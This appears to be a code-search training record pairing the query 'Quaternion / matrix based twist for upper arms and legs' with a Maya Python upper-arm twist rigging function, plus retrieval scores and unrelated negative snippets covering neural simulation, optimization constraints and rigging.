namespace=paramint, name='synDEDIa')\n synDEDIa.connect()\n synDEDIa.w = 'gEIa/gleakI'\n\n # GABA: inh --> exc\n synDIDE = Synapses(decI, decE, model='w : 1', method=nummethod,\n on_pre='g_i += w', delay=d,\n namespace=paramint, name='synDIDE')\n synDIDE.connect()\n synDIDE.w = 'gIE/gleakE'\n\n # GABA: inh --> inh\n synDIDI = Synapses(decI, decI, model='w : 1', method=nummethod,\n on_pre='g_i += w', delay=d,\n namespace=paramint, name='synDIDI')\n synDIDI.connect()\n synDIDI.w = 'gII/gleakI'\n\n # external inputs and connections\n extE = PoissonInput(decE[:N_D1 + N_D2], 'g_ea', N=1, rate=nu_ext1, weight='gXE/gleakE')\n extE3 = PoissonInput(decE3, 'g_ea', N=1, rate=nu_ext, weight='gXE/gleakE')\n extI = PoissonInput(decI, 'g_ea', N=1, rate=nu_ext, weight='gXI/gleakI')\n\n # variables to return\n groups = {'DE': decE, 'DI': decI, 'DX': extE, 'DX3': extE3, 'DXI': extI}\n subgroups = {'DE1': decE1, 'DE2': decE2, 'DE3': decE3}\n synapses = {'synDEDEn': synDEDEn,\n 'synDEDEa': synDEDEa, 'synDEDIa': synDEDIa,\n 'synDIDE': synDIDE, 'synDIDI': synDIDI} # 'synDEDIn': synDEDIn,\n\n return groups, synapses, subgroups", "def make_constraint(n_class):\n m = np.identity(n_class)\n m = np.vstack([m, np.ones(n_class)])\n\n lb = [epsilon] * n_class\n lb.append(1.0)\n ub = [1.0 - epsilon] * n_class\n ub.append(1.0)\n\n c = scipy.optimize.LinearConstraint(\n A=m,\n lb=lb,\n ub=ub,\n keep_feasible=True,\n )\n return c", "def ensure_default_constraints(self):\r\n positive_strings = ['variance', 'lengthscale', 'precision', 'decay', 
'kappa']\r\n # param_names = self._get_param_names()\r\n currently_constrained = self.all_constrained_indices()\r\n to_make_positive = []\r\n for s in positive_strings:\r\n for i in self.grep_param_names(\".*\" + s):\r\n if not (i in currently_constrained):\r\n to_make_positive.append(i)\r\n if len(to_make_positive):\r\n self.constrain_positive(np.asarray(to_make_positive))", "def pk_constrained(self, snr=30, headroom = 0):\n # Initialize\n self.pk = np.zeros((self.n_waves, len(self.controls.k0)), dtype=np.csingle)\n # loop over frequencies\n bar = tqdm(total = len(self.controls.k0), desc = 'Calculating Constrained Optim.')\n for jf, k0 in enumerate(self.controls.k0):\n # get the scaled version of the propagating directions\n k_vec = k0 * self.dir\n # Form the sensing matrix\n h_mtx = np.exp(1j*self.receivers.coord @ k_vec.T)\n H = h_mtx.astype(complex) # cvxpy does not accept floats, apparently\n # measured data\n pm = self.pres_s[:,jf].astype(complex)\n # Performing constrained optmization cvxpy\n x_cvx = cp.Variable(h_mtx.shape[1], complex = True) # create x variable\n # Create the problem\n epsilon = 10**(-(snr-headroom)/10)\n problem = cp.Problem(cp.Minimize(cp.norm2(x_cvx)**2),\n [cp.pnorm(pm - cp.matmul(H, x_cvx), p=2) <= epsilon])\n problem.solve(solver=cp.SCS, verbose=False)\n self.pk[:,jf] = x_cvx.value\n bar.update(1)\n bar.close()", "def hardsigmoid(input, inplace=False):\n return FunctionLib.apply(\n 'HardSigmoid', input.device, [input],\n outputs=[input if inplace else None], alpha=1. / 6., beta=0.5)", "def set_enzyme_constraint(model, reaction_kcat_mw, lowerbound, upperbound):\n coefficients = dict()\n for rxn in model.reactions:\n if rxn.id in reaction_kcat_mw.index:\n coefficients[rxn.forward_variable] = 1 / \\\n float(reaction_kcat_mw.loc[rxn.id, 'kcat_MW'])\n constraint = model.problem.Constraint(0, lb=lowerbound, ub=upperbound)\n model.add_cons_vars(constraint)\n model.solver.update()\n constraint.set_linear_coefficients(coefficients=coefficients)\n return model", "def RestrictionRequireProvideDependency(self, alphaCompId, betaCompId, alphaCompIdInstances, betaCompIdInstances):\n #self.problem.logger.debug(\"RestrictionRequireProvideDependency: alphaCompId={}, betaCompId={}, alphaCompIdInstances={}, \"\n # \"betaCompIdInstances={}\".format(alphaCompId, betaCompId, alphaCompIdInstances, betaCompIdInstances))\n\n if self.solverTypeOptimize:\n\n bvars1 = [(self.a[alphaCompId * self.nrVM + j], alphaCompIdInstances) for j in range(self.nrVM)]\n bvars2 = [(self.a[betaCompId * self.nrVM + j], -betaCompIdInstances) for j in range(self.nrVM)]\n bvars = bvars1 + bvars2\n\n self.solver.add(PbLe( [x for x in bvars], 0))\n else:\n self.__constMap[\"LabelRequireProvide: \" + str(self.labelIdx)] = \\\n alphaCompIdInstances * sum([If(self.a[alphaCompId * self.nrVM + j], 1, 0) for j in range(self.nrVM)]) \\\n <= \\\n betaCompIdInstances * sum([If(self.a[betaCompId * self.nrVM + j], 1, 0) for j in range(self.nrVM)])\n self.solver.assert_and_track(\n alphaCompIdInstances * sum([If(self.a[alphaCompId * self.nrVM + j], 1, 0) for j in range(self.nrVM)]) <=\n betaCompIdInstances * sum([If(self.a[betaCompId * self.nrVM + j],1, 0) for j in range(self.nrVM)]), \"LabelRequireProvide: \" + str(self.labelIdx))\n self.labelIdx += 1", "def pre_instance_ip_create(self, resource_dict):\n pass", "def add_constraint(self, constraint):\n self.add_constraint_sig(\n ConstraintSignature.from_constraint(constraint))", "def add_constraint(self, name, constraint_obj, dofidxs, Xidxs=()):\n logger = 
logging.getLogger(__name__)\n logger.debug('Adding constraint {} to dofs {} and nodes {}'.format(name, dofidxs, Xidxs))\n\n # Create new rows for constraints_df\n df = pd.DataFrame(\n {'name': name, 'constraint_obj': constraint_obj,\n 'dofidxs': [np.array([dofidxs], dtype=np.intp).reshape(-1)],\n 'Xidxs': [np.array([Xidxs], dtype=np.intp).reshape(-1)]},\n )\n\n self._constraints_df = pd.concat([self._constraints_df, df], ignore_index=True)\n constraint_obj.after_assignment(dofidxs)\n\n self._update_flag = True\n \n return", "def add_constraint(self, constraint, problem):\n problem += constraint", "def switch_setup(params, rig, ik_joints):\n\n # Duplicate for bind skeleton\n skeleton = [x.name() for x in params['ikSkeleton']]\n bind_skeleton = cmds.duplicate(skeleton, n=skeleton[0] + '_bnd_0')\n #bind_skeleton\n\n # Hide all attribute on Controller\n fkikcontrol = params['fkIkSwitch'].name()\n attrs = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v']\n for i in attrs:\n cmds.setAttr('{node}.{attr}'.format(node=fkikcontrol, attr=i), k=False, cb=False)\n\n # Create FK/IK Switch attributes\n cmds.addAttr(fkikcontrol, sn='FKIKBlend', at='float', min=0, max=1, dv=0, k=True)\n cmds.addAttr(fkikcontrol, sn='AutoVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='FKVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='IKVis', at='bool', dv=1, k=True)\n\n # create control offset transforms\n # par = cmds.listRelatives(fkikcontrol, parent=True)\n # buf = create_offset_transform(fkikcontrol, BUF)\n # cmds.parent(fkikcontrol, buf)\n # if par: cmds.parent(buf, par[0])\n\n # Parent Skeleton to rig group\n ik_skeleton = [x.name() for x in params['ikSkeleton']]\n fk_skeleton = [x.name() for x in params['fkSkeleton']]\n cmds.parent(ik_skeleton[0], rig['rigGroup'])\n cmds.parent(fk_skeleton[0], rig['rigGroup'])\n\n # Constraint Bind Skeleton\n fk_ik_finish(ik_joints, bind_skeleton, params)", "def _add_graph_to_env_with_assert_soft(self, env, encoding):\n cost = env.declare_fun(\"cost\", Environment.REAL)\n\n opts = {\n \"id\" : cost\n }\n\n # add nodes\n uids = self._nodes.keys()\n uids.sort()\n for node_uid in uids:\n node = self._nodes[node_uid]\n if (node.get_cost() != 0):\n node.add_node_to_env(env, encoding, opts)\n\n # add edges\n uids = self._edges.keys()\n uids.sort()\n for edge_uid in uids:\n edge = self._edges[edge_uid]\n if (edge.get_cost() != 0):\n edge.add_edge_to_env(env, encoding, opts)\n\n return cost" ]
[ "0.5469389", "0.531737", "0.52888745", "0.51781154", "0.50092465", "0.49953595", "0.49701515", "0.4952075", "0.49448365", "0.49093467", "0.49027547", "0.4884955", "0.4834274", "0.47601178", "0.47214177", "0.46724012", "0.4648716", "0.46426857", "0.4633451", "0.46300042", "0.46296412", "0.4621398", "0.46171993", "0.45797682", "0.45698234", "0.4551361", "0.4544794", "0.45422685", "0.45376104", "0.45184177", "0.4506468", "0.45009637", "0.4496136", "0.4496136", "0.44946757", "0.44938493", "0.44897267", "0.44862762", "0.44700927", "0.44500896", "0.4448092", "0.44381794", "0.44330004", "0.44305578", "0.442912", "0.4427677", "0.44256943", "0.44236663", "0.44236663", "0.4422735", "0.44025669", "0.43981457", "0.43956965", "0.43945152", "0.43853974", "0.43836325", "0.43816638", "0.4378772", "0.4376063", "0.43685094", "0.43475145", "0.43471542", "0.4343365", "0.433937", "0.43392196", "0.4338818", "0.43358377", "0.43309873", "0.43257737", "0.43217847", "0.43204236", "0.43196267", "0.43188182", "0.4307706", "0.43008593", "0.42735362", "0.42703828", "0.42690527", "0.42618665", "0.42501935", "0.42472064", "0.4246659", "0.42464435", "0.4244499", "0.42437243", "0.42386106", "0.423683", "0.42354515", "0.42308676", "0.4230076", "0.42295685", "0.42259663", "0.4222009", "0.42174864", "0.4215837", "0.42073435", "0.42004547", "0.41973498", "0.4197306", "0.41959858" ]
0.7518777
0
Quaternion / matrix based twist for upper arms and legs.
def upper_twist(shoulder_jnt, up_arm_ik_jnt, lo_arm_ik_jnt, up_arm_jnt, lo_arm_jnt, up_arm_twist_jnts):

    # Create a group that does not rotate and parent under the ik arm parent (shoulder)
    stable_reader_grp = utils.create_node('transform', n=up_arm_ik_jnt+'_stable_reader', p=up_arm_ik_jnt)

    # Create a grp that will rotate with ik arm
    twist_reader_grp = utils.create_node('transform', n=up_arm_ik_jnt+'_twist_reader', p=up_arm_ik_jnt)
    twist_driver_grp = utils.create_node('transform', n=up_arm_ik_jnt+'_twist', p=twist_reader_grp)

    mc.parent(stable_reader_grp, shoulder_jnt)
    mc.addAttr(twist_reader_grp, ln='twist', k=1)

    # Now set up mult matrix and decomp nodes to extract the twist between the two nodes
    mult_mtx = mc.createNode('multMatrix')
    decomp_mtx = mc.createNode('decomposeMatrix')
    quat_to_euler = mc.createNode('quatToEuler')

    mc.connectAttr(stable_reader_grp+'.worldInverseMatrix', mult_mtx+'.matrixIn[1]')
    mc.connectAttr(twist_reader_grp+'.worldMatrix', mult_mtx+'.matrixIn[0]')
    mc.connectAttr(mult_mtx+'.matrixSum', decomp_mtx+'.inputMatrix')
    mc.connectAttr(decomp_mtx+'.outputQuatX', quat_to_euler+'.inputQuatX')
    mc.connectAttr(decomp_mtx+'.outputQuatW', quat_to_euler+'.inputQuatW')

    utils.connect_negative(quat_to_euler+'.outputRotateX', twist_reader_grp+'.twist')
    mc.connectAttr(twist_reader_grp+'.twist', twist_driver_grp+'.rx')

    # Connect joints
    mc.parentConstraint(twist_driver_grp, up_arm_jnt, mo=1)
    mc.parentConstraint(lo_arm_ik_jnt, lo_arm_jnt, mo=1)

    div = 1.0 / (len(up_arm_twist_jnts))

    mdl = mc.createNode('multDoubleLinear')
    mc.setAttr(mdl+'.input1', div)
    mc.connectAttr(quat_to_euler+'.outputRotateX', mdl+'.input2')

    for i, joint in enumerate(up_arm_twist_jnts[:-1]):
        mc.connectAttr(mdl+'.output', joint+'.rx')

    mc.orientConstraint(up_arm_ik_jnt, up_arm_twist_jnts[-1], mo=1)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lower_twist(lo_arm_ik_jnt, wrist_ik_jnt, lo_arm_jnt, lo_arm_twist_jnts, wrist_jnt=None):\n\n # Create a group that does not rotate and parent under the ik arm parent (shoulder)\n stable_reader_grp = utils.create_node('transform', n=lo_arm_ik_jnt+'_stable_reader', p=lo_arm_ik_jnt)\n\n # Create a grp that will rotate with ik arm\n twist_reader_grp = utils.create_node('transform', n=lo_arm_ik_jnt+'_twist_reader', p=lo_arm_ik_jnt)\n mc.addAttr(twist_reader_grp, ln='twist', k=1)\n\n mc.delete(mc.pointConstraint(wrist_ik_jnt, twist_reader_grp))\n mc.parent(twist_reader_grp, wrist_ik_jnt)\n\n # Now set up mult matrix and decomp nodes to extract the twist between the two nodes\n mult_mtx = mc.createNode('multMatrix')\n decomp_mtx = mc.createNode('decomposeMatrix')\n quat_to_euler = mc.createNode('quatToEuler')\n\n mc.connectAttr(stable_reader_grp+'.worldInverseMatrix', mult_mtx+'.matrixIn[1]')\n mc.connectAttr(twist_reader_grp+'.worldMatrix', mult_mtx+'.matrixIn[0]')\n mc.connectAttr(mult_mtx+'.matrixSum', decomp_mtx+'.inputMatrix')\n mc.connectAttr(decomp_mtx+'.outputQuatX', quat_to_euler+'.inputQuatX')\n mc.connectAttr(decomp_mtx+'.outputQuatW', quat_to_euler+'.inputQuatW')\n\n utils.connect_negative(quat_to_euler+'.outputRotateX', twist_reader_grp+'.twist')\n\n # Connect joints\n mc.parentConstraint(lo_arm_ik_jnt, lo_arm_jnt, mo=1)\n if wrist_jnt:\n mc.parentConstraint(wrist_ik_jnt, wrist_jnt, mo=1)\n\n div = 1.0 / (len(lo_arm_twist_jnts))\n\n mdl = mc.createNode('multDoubleLinear')\n mc.setAttr(mdl+'.input1', div)\n mc.connectAttr(quat_to_euler+'.outputRotateX', mdl+'.input2')\n\n for i, joint in enumerate(lo_arm_twist_jnts):\n mc.connectAttr(mdl+'.output', joint+'.rx')", "def Areml_eigh(self):\n s,U = LA.eigh(self.Areml(),lower=True)\n i_pos = (s>1e-10)\n s = s[i_pos]\n U = U[:,i_pos]\n return s,U", "def lfunc(x,u):\n return mpc.mtimes(u.T, R, u) + mpc.mtimes((x-goal).T, Q, (x-goal))", "def other_quadrants(self, matrix):\n q2 = deepcopy(matrix)\n q2t = [-1, 1]\n q2f = []\n for j in range(len(q2)):\n list = [q2[j][i] * q2t[i] for i in range(2)]\n dist = self.get_dist(list[0], list[1])\n\n if dist <= self.max_distance:\n list.append(matrix[j][2])\n q2f.append(list)\n\n q3 = deepcopy(matrix)\n q3t = [-1, -1]\n q3f = []\n for j in range(len(q3)):\n list = [q3[j][i] * q3t[i] for i in range(2)]\n dist = self.get_dist(list[0], list[1])\n\n if dist <= self.max_distance:\n list.append(matrix[j][2])\n q3f.append(list)\n\n q4 = deepcopy(matrix)\n q4t = [1, -1]\n q4f = []\n for j in range(len(q3)):\n list = [q4[j][i] * q4t[i] for i in range(2)]\n dist = self.get_dist(list[0], list[1])\n\n if dist <= self.max_distance:\n list.append(matrix[j][2])\n q4f.append(list)\n\n return q2f, q3f, q4f", "def illuminator_of_elfes():\n\n\t# Alpha - simplified by taking out the i by multiplying the outerproduct by 2i\n\talpha1i = np.matrix([[0, 0, 0, 2], [0, 0, 2, 0], [0, -2, 0, 0], [-2, 0, 0, 0]])\n\talpha2i = np.matrix([[0, 2, 0, 0], [-2, 0, 0, 0], [0, 0, 0, 2], [0, 0, -2, 0]])\n\talpha3i = np.matrix([[0, 0, 2, 0], [0, 0, 0, -2], [-2, 0, 0, 0], [0, 2, 0, 0]])\n\n\t# Betas - simplified by taking out the i by multiplication of outerprod by 2i\n\tbeta1i = np.matrix([[0, 0, 0, 2], [0, 0, -2, 0], [0, 2, 0, 0], [-2, 0, 0, 0]])\n\tbeta2i = np.matrix([[0, 0, 2, 0], [0, 0, 0, 2], [-2, 0, 0, 0], [0, -2, 0, 0]])\n\tbeta3i = np.matrix([[0, 2, 0, 0], [-2, 0, 0, 0], [0, 0, 0, -2], [0, 0, 2, 0]])\n\n\t# print(\"alpha 1\")\n\t# print(alpha1i)\n\t# print(\"\")\n\t# print(\"alpha 2\")\n\t# print(alpha2i)\n\t# print(\"\")\n\t# 
print(\"alpha 3\")\n\t# print(alpha3i)\n\t# print(\"\")\n\t# print(\"beta 1\")\n\t# print(beta1i)\n\t# print(\"\")\n\t# print(\"beta 2\")\n\t# print(beta2i)\n\t# print(\"\")\n\t# print(\"beta 3\")\n\t# print(beta3i)\n\t# print(\"\")\n\n\t# abperm_comb = [ np.multiply(alpha1i,-1), np.multiply(alpha2i,-1), np.multiply(alpha3i,-1), np.multiply(beta1i,-1), np.multiply(beta2i,-1), np.multiply(beta3i,-1)]\n\n\tabperm_comb = [alpha1i, alpha2i, alpha3i, beta1i, beta2i, beta3i]\n\treturn abperm_comb", "def lap_mat(self):", "def transform_traj(traj, ego_HTM, th):\r\n traj_pos = np.concatenate([traj[:, :2], np.ones([len(traj), 1])], axis=1)\r\n traj_pos = np.matmul(ego_HTM, traj_pos.transpose()).transpose()\r\n traj_th = traj[:, 2] - th\r\n traj_pos[:, 2] = traj_th\r\n return traj_pos", "def fkine(robot, q):\n\n q = mat(q)\n n = robot.n\n if numrows(q)==1 and numcols(q)==n:\n t = robot.base\n for i in range(0,n):\n t = t * robot.links[i].tr(q[0,i])\n t = t * robot.tool\n return t\n else:\n if numcols(q) != n:\n raise Exception('bad data')\n t = []\n for qv in q: # for each trajectory point\n tt = robot.base\n for i in range(0,n):\n tt = tt * robot.links[i].tr(qv[0,i])\n t.append(tt*robot.tool)\n return t", "def Phieqfun(Phibar,DPhieq,lambdas,mus,I,J,g):\n\n PhieqMat=Phibar*np.ones((J,I)) #initialize to flat nightside geopotentiAL\n \n for i in range(I):\n for j in range(J):\n #assume substellar point is (0,0)\n if -np.pi/2<lambdas[i]<np.pi/2: #only force the dayside\n PhieqMat[j,i]=PhieqMat[j,i]+DPhieq*np.cos(lambdas[i])*np.sqrt((1-mus[j]**2)) \n \n return PhieqMat", "def inv_kin(self, xy):\n\n def distance_to_default(q, *args): \n \"\"\"Objective function to minimize\n Calculates the euclidean distance through joint space to the default\n arm configuration. The weight list allows the penalty of each joint \n being away from the resting position to be scaled differently, such\n that the arm tries to stay closer to resting state more for higher \n weighted joints than those with a lower weight.\n \n :param list q: the list of current joint angles\n :returns scalar: euclidean distance to the default arm position\n \"\"\"\n # weights found with trial and error, get some wrist bend, but not much\n weight = [1, 1, 1.3, 1] \n return np.sqrt(np.sum([(qi - q0i)**2 * wi\n for qi,q0i,wi in zip(q, self.q0, weight)]))\n\n def x_constraint(q, xy):\n \"\"\"Returns the corresponding hand xy coordinates for \n a given set of joint angle values [shoulder, elbow, wrist], \n and the above defined arm segment lengths, L\n \n :param list q: the list of current joint angles\n :returns: the difference between current and desired x position\n \"\"\"\n x = ( self.L[0]*np.cos(q[0]) + self.L[1]*np.cos(q[0]+q[1]) + \n self.L[2]*np.cos(q[0]+q[1]+q[2]) + self.L[3]*np.cos(np.sum(q)) ) - xy[0]\n return x\n\n def y_constraint(q, xy): \n \"\"\"Returns the corresponding hand xy coordinates for \n a given set of joint angle values [shoulder, elbow, wrist], \n and the above defined arm segment lengths, L\n \n :param list q: the list of current joint angles\n :returns: the difference between current and desired y position\n \"\"\"\n y = ( self.L[0]*np.sin(q[0]) + self.L[1]*np.sin(q[0]+q[1]) + \n self.L[2]*np.sin(q[0]+q[1]+q[2]) + self.L[3]*np.sin(np.sum(q)) ) - xy[1]\n return y\n\n return scipy.optimize.fmin_slsqp( func=distance_to_default, \n x0=self.q, eqcons=[x_constraint, y_constraint], \n args=(xy,), iprint=0) # iprint=0 suppresses output", "def lie_bracket(self, matrix_a, matrix_b):\n return gs.matmul(matrix_a, matrix_b) - 
gs.matmul(matrix_b, matrix_a)", "def reverse_quad(q):\n return [q[1], q[0], q[3], q[2]]", "def needwu(A,B,S,d):\n AlignementA=\"\"\n AlignementB=\"\"\n F=matriF(A,B,S,d)\n i=len(A)-1\n j=len(B)-1\n\n while i>0 and j>0:\n score=F[i][j]\n scorediag=F[i-1][j-1]\n scoreup=F[i][j-1]\n scoreleft=F[i-1][j]\n\n if score==(scorediag+S[ind(A[i])][ind(B[j])]):\n AlignementA=A[i]+AlignementA\n AlignementB=B[j]+AlignementB\n i=i-1\n j=j-1\n\n elif score==(scoreleft+d):\n AlignementA=A[i]+AlignementA\n AlignementB=\"-\"+AlignementB\n i=i-1\n\n elif score==(scoreup+d):\n AlignementA=\"-\"+AlignementA\n AlignementB=B[j]+AlignementB\n j=j-1\n\n while i>0:\n AlignementA=A[i]+AlignementA\n AlignementB=\"-\"+AlignementB\n i=i-1\n\n while j>0:\n AlignementA=\"-\"+AlignementA\n AlignementB=B[j]+AlignementB\n j=j-1\n\n return AlignementA, AlignementB", "def test_quaternion_hamilton():\n q_ij = pr.concatenate_quaternions(pr.q_i, pr.q_j)\n assert_array_equal(pr.q_k, q_ij)\n q_ijk = pr.concatenate_quaternions(q_ij, pr.q_k)\n assert_array_equal(-pr.q_id, q_ijk)", "def T(self):\n # TODO - your code here\n transpose = []\n for col in range(self.w):\n new_row = []\n for row in range(self.h):\n new_row.append(self.g[row][col])\n transpose.append(new_row)\n return Matrix(transpose)\n # TODO - your code here", "def Rt(X):\n return X[:2,:2], X[:2, 2]", "def housetriang(A, B):\n m, n = shape(A); r = shape(B)[1] ; A=hstack([A,B]); \n minval = array([n, m - 1]).min()\n for k in range(minval):\n v, A[k, k] = housegen(A[k:m, k])\n v = matrix(reshape(v, (m - k, 1)))\n C = A[k:m, (k+1):(n+r)] ; A[k:m, (k + 1):(n + r)] = C - v*(v.T*C)\n R = triu(A[:, :n]); C = A[:, n:(n + r)]\n return R, C", "def __rmul__(self, other):#标量乘法\n if isinstance(other, numbers.Number):\n pass\n # \n # TODO - your code here\n #\n result = [];\n row_result = [];\n \n for row in self.g:\n row_result = [m*other for m in row];\n result.append(row_result);\n return Matrix(result);", "def getQ(m, t):\n\n Q = []\n for r in range(len(t)):\n qrow = []\n for c in range(len(t)):\n qrow.append(m[t[r]][t[c]])\n Q.append(qrow) \n return Q", "def _transform_coordinates(rectangle, Q=np.matrix(((1, 1), (-1, 1)))):\n return tuple((rectangle[0]*Q).A1), tuple((rectangle[1]*Q).A1)", "def quat2transform(q):\n x, y, z, w = q\n xx2 = 2 * x * x\n yy2 = 2 * y * y\n zz2 = 2 * z * z\n xy2 = 2 * x * y\n wz2 = 2 * w * z\n zx2 = 2 * z * x\n wy2 = 2 * w * y\n yz2 = 2 * y * z\n wx2 = 2 * w * x\n\n rmat = np.empty((3, 3), float)\n rmat[0,0] = 1. - yy2 - zz2\n rmat[0,1] = xy2 - wz2\n rmat[0,2] = zx2 + wy2\n rmat[1,0] = xy2 + wz2\n rmat[1,1] = 1. - xx2 - zz2\n rmat[1,2] = yz2 - wx2\n rmat[2,0] = zx2 - wy2\n rmat[2,1] = yz2 + wx2\n rmat[2,2] = 1. 
- xx2 - yy2\n\n return rmat", "def sqrtw():\n return Operator([[(1.+1.j)/2,-1.j/np.sqrt(2)],[1./np.sqrt(2),(1.+1.j)/2]])", "def transverse_resonator(Rs, Q, wr, w):\n Rs = _np.array(Rs,ndmin=1,dtype=float)[:,None] # I am using broadcasting\n Q = _np.array(Q, ndmin=1,dtype=float)[:,None]\n wr = _np.array(wr,ndmin=1,dtype=float)[:,None]\n Zt = wr*Rs/(w + 1j*Q*(wr - w**2/wr))\n return Zt.sum(0).flatten()", "def test_align_invert(self):\n al = align(self.amp1, self.amp2, inverse=False)\n\n al_inv = align(self.amp2, self.amp1, inverse=True)\n\n print(al.R)\n print(al_inv.R)\n\n print(al.T)\n print(al_inv.T)", "def leg_tr(tr_leg, tens_list, legs_list, ent_list):\n q_index = [legs.__contains__(tr_leg) for legs in legs_list].index(True,0)\n ax1 = legs_list[q_index].index(tr_leg,0)\n ax2 = legs_list[q_index].index(tr_leg,ax1+1)\n tens_list[q_index] = np.trace(tens_list[q_index], offset=0, axis1=ax1, axis2=ax2)\n legs_list[q_index].remove(tr_leg)\n legs_list[q_index].remove(tr_leg)\n ent_list[tr_leg] = np.array([0])", "def trace(q_1: Qs) -> Qs:\n\n if q_1.rows != q_1.columns:\n raise ValueError(f\"Oops, not a square quaternion series: {q_1.rows}/{q_1.columns}\")\n\n else:\n tr = q_1.qs[0]\n\n for i in range(1, q_1.rows):\n tr = add(tr, q_1.qs[i * (q_1.rows + 1)])\n\n return Qs([tr])", "def relTrace(mat, spinorsize):\n\n top = mat[:spinorsize, :spinorsize]\n bottom = mat[spinorsize:, spinorsize:]\n return 2*(top+bottom)", "def gram_schmidt(mat_a):\n # NOTE: We will use the same variable names as the one in the\n # pseudo code for clarity\n rows_count = mat_a.shape[0]\n\n u = mat_a.copy()\n r = np.zeros_like(u)\n q = np.zeros_like(u)\n for i in range(rows_count):\n u_i = u[:, i]\n r[i, i] = np.linalg.norm(u_i)\n q[:, i] = u_i / r[i, i] if r[i, i] != 0 else 0\n q_i = q[:, i]\n\n r[i, i + 1:] = q_i.T.dot(u[:, i + 1:])\n # np.outer will multiply q_i by each number in r[i, i + 1:], and create\n # a matrix that each column is a result of that multiplication\n u[:, i + 1:] -= np.outer(q_i, r[i, i + 1:])\n\n return q, r", "def upper_tri(A):\n d = pairwise_distances(A,A)\n m = d.shape[0]\n r,c = np.triu_indices(m,1)\n return(d[r,c])", "def calc_quad(self,mw,A0,A1,A2): \n return (A0 + A1 * mw + A2 * mw**2)", "def triquad():\n return Formex(mpattern('12-34'))", "def quatRightMat(q):\n\ts = q[0]\n\tv = q[1:].reshape(-1,)\n\tR = np.zeros((4, 4))\n\tR[0, 0] = s\n\tR[0, 1:] = -v\n\tR[1:, 0] = v\n\tR[1:, 1:] = s*np.eye(3) - skewMat(v)\n\treturn R", "def inverse_kinematics_baxter(TM_W0_Gtool, arm_side):\n\n # Get all constants for the distances and transformations for Baxter\n Constants = constants_baxter.GetConstants()\n L0 = Constants.L0\n L1 = Constants.L1\n L2 = Constants.L2\n L3 = Constants.L3\n L4 = Constants.L4\n L6 = Constants.L6\n L = Constants.L\n h = Constants.h\n H = Constants.H\n LH = Constants.LH\n TM_W0_BL = Constants.TM_W0_BL\n TM_W0_BR = Constants.TM_W0_BR\n TM_BL_0 = Constants.TM_BL_0\n TM_BR_0 = Constants.TM_BR_0\n TM_7_GL = Constants.TM_7_GL\n TM_7_GR = Constants.TM_7_GR\n\n # Apply inverse kinematics for the left arm\n if arm_side == \"left\":\n # Understanding the corresponding TM from the article, this can be solved:\n TM_0_6 = np.dot(np.dot(np.linalg.inv(np.dot(TM_W0_BL,TM_BL_0)), TM_W0_Gtool), np.linalg.inv((TM_7_GR)))\n\n # Find theta1\n PX_0_4 = TM_0_6[0, 3]\n PY_0_4 = TM_0_6[1, 3]\n\n theta1 = math.atan2(PY_0_4, PX_0_4)\n\n # Find theta2\n PZ_0_4 = TM_0_6[2, 3]\n E = 2*LH*(L1 - PX_0_4/math.cos(theta1))\n F = 2*LH*PZ_0_4\n G = (PX_0_4**2)/((math.cos(theta1))**2) + L1**2 + LH**2 - L4**2 + 
PZ_0_4**2 - 2*L1*PX_0_4/math.cos(theta1)\n\n\n if (E**2 + F**2 - G**2)>0:\n t1 = (-F + math.sqrt(E**2 + F**2 - G**2))/(G - E)\n else: \n t1 = (-F - 0)/(G - E)\n theta2 = 2*math.atan(t1)\n\n # We make only use the real part (img is not significant most of the times)\n #if (E**2 + F**2 - G**2)>0:\n #t2 = (-F - math.sqrt(E**2 + F**2 - G**2))/(G - E)\n #else:\n #t2 = (-F - 0)/(G - E)\n #theta2 = 2*math.atan(t2)\n\n\n\n # Find theta4\n theta4 = math.atan2(-PZ_0_4 - LH*math.sin(theta2), PX_0_4/math.cos(theta1) - L1 - LH*math.cos(theta2)) - theta2\n\n # Find theta5\n DH_0_3 = np.array([[0, 0, 0, theta1],\n [-math.pi/2, L1, 0, theta2],\n [0, LH, 0, theta4 + math.pi/2]])\n\n TM_0_3 = denavit_hartenberg.denavit_hartenberg(DH_0_3, 0)\n R_0_3 = TM_0_3[0:3, 0:3]\n\n R_0_6 = TM_0_6[0:3, 0:3]\n\n R_3_6 = np.dot(np.linalg.inv(R_0_3), R_0_6)\n\n theta5 = math.atan2(R_3_6[2,2], R_3_6[0,2])\n\n # Find theta7\n theta7 = math.atan2(-R_3_6[1,1], R_3_6[1,0])\n\n\n # Find theta6\n theta6 = math.atan2(R_3_6[1,0]/math.cos(theta7), -R_3_6[1,2])\n\n\n return [theta1, theta2, theta4, theta5, theta6, theta7]", "def approx_shoulders(upper_body_roi):\n height = upper_body_roi.shape[0]; width = upper_body_roi.shape[1]\n return (int(width / 6), int((height / 4) * 3)), (int((width / 6) * 5), int((height / 4) * 3))", "def triangulate_analytic(self, x1,y1,r1,x2,y2,r2,x3,y3,r3):\n gamma=(r1**2+x2**2+y2**2-x1**2-y1**2-r2**2)/(float(2.0*(x2-x1)))-x1\n Lambda=(y1-y2)/float(x2-x1)\n y_plus=(-2.0*(gamma*Lambda-y1)+np.sqrt(4*(gamma*Lambda-y1)**2-4*(Lambda**2+1)*(gamma**2+y1**2-r1**2)))/float(2*(Lambda**2+1))\n y_minus=(-2.0*(gamma*Lambda-y1)-np.sqrt(4*(gamma*Lambda-y1)**2-4*(Lambda**2+1)*(gamma**2+y1**2-r1**2)))/float(2*(Lambda**2+1))\n x_plus=gamma+x1+(Lambda*y_plus)\n x_minus=gamma+x1+(Lambda*y_minus)\n difference_plus=(x_plus-x3)**2+(y_plus-y3)**2-r3**2\n difference_minus=(x_minus-x3)**2+(y_minus-y3)**2-r3**2\n if abs(difference_minus) < abs(difference_plus):\n print \"Difference minus\", difference_minus\n print x_minus, y_minus\n return x_minus, y_minus, difference_minus\n else:\n print \"Difference plus\", difference_plus\n print x_plus, y_plus\n return x_plus, y_plus, difference_plus", "def make_sq(mlat, dAB, *J):\n if (len(J)!=4):\n print(\"Number of paramaters are exceeded 5!\")\n NN = 2*mlat\n \n tau = np.zeros((NN,NN), dtype=complex)\n h = np.zeros((NN,NN), dtype=complex)\n \n for i in range(mlat-1):\n if (i%2==0):\n h[i,i] = dAB/2. # on-site energy\n h[mlat+i,mlat+i] = 